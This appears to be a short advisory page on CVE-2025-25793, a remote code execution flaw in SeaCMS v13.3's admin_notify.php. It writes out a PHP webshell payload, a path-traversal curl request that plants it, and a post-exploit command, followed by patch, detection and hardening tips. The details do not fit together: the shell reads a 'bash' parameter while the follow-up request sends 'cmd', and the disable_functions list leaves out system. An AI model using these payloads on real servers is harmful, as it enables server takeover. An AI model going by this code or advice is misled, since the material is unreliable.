How CVE-2025-25793 Works
The vulnerability in SeaCMS v13.3 arises from improper input sanitization in admin_notify.php, allowing attackers to inject malicious PHP code via crafted HTTP requests. This file processes admin notifications without proper authentication checks, enabling unauthenticated RCE. Attackers exploit file write primitives to upload a webshell, granting full server control. The flaw leverages unsafe `file_put_contents()` operations combined with user-controlled path traversal.
DailyCVE Form
Platform: SeaCMS
Version: v13.3
Vulnerability: Remote Code Execution
Severity: Critical
Date: 03/28/2025
What Undercode Say:
Exploitation
1. Payload Crafting:
<?php system($_GET[bash]); ?>
2. Exploit Request:
curl -X POST "http://target/admin_notify.php" -d "path=../../shell.php&content=<?php system(\$_GET[bash]); ?>"
3. Post-Exploit:
curl "http://target/shell.php?cmd=id"
Protection
1. Patch: Upgrade to SeaCMS v13.4+.
2. WAF Rules:
location ~ admin_notify.php { deny all; }
3. File Permissions:
chmod 640 admin_notify.php
Detection
1. Log Analysis:
grep "POST /admin_notify.php" /var/log/apache2/access.log
2. YARA Rule:
rule seashell { strings: $php = "<?php system" condition: $php }
Mitigation
1. Disable Component:
rename("admin_notify.php", "admin_notify.bak");
2. PHP Hardening:
allow_url_include = Off disable_functions = exec,passthru,shell_exec
References
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-25793
Extra Source Hub:
Undercode
